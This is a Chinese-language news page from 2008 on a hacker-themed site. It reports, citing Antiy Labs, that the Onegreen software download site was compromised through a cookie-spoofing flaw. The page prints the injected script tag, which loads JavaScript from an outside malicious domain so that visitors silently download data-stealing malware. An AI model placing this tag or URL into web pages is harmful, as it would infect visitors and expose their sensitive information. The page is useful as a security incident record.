您现在的位置: QQ黑客基地 >> 新闻中心 >> 被黑新站 >> 文章正文
绿色软件站挂马事件
作者:admin2    文章来源:网络收集    点击数:    更新时间:2008-1-17 
   

 近日安天实验室反病毒监测网发现,绿色软件站 (http://www.onegreen.net/index.asp)被黑客植入病毒,利用了Cookies 欺骗漏洞挂马,用户如果访问该网站,会被病毒感染。系统就会自动从恶意网站上下载并运行多个恶意程序。盗取用户敏感信息。

  该网站的主页里被插入如下框架:

  

  代码:

      <script language="JavaScript"
  src="http://ad.goosms.cn/adv/onegreen.asp
  ?cid157&a=&b=&c=&d=&e=&f=" type="text/javascript"   id="onegreen"></script>

      http://ad.goosms.cn/adv/onegreen.asp?
  cid157&a=&b=&c=&d=&e=&f=

      得到代码如下:

  

  从代码分析并未分析出可疑的地方,对其抓包分析发现利用了Cookies欺骗漏洞挂马。

  抓包结果如图:

  

  从抓包来看出其利用的Cookies 欺骗挂马方式。


  • 上一篇文章:

  • 下一篇文章:

  • 最新更新文章
     
    热门推荐文章
     
     

    关于我们 联系我们 招聘信息 加入会员 诚征代理 广告服务 欢迎投稿 友情链接 网站地图
    24咨询电话:029-38118822 13279515908 投诉电话:029-38118822
    客服QQ:36362 售后QQ:244163 技术QQ:250366708
    Copyright ©2007版权没有-任意抄袭-确保完整
    陇ICP备06000402号
    [设为首页]·[加入收藏]

    o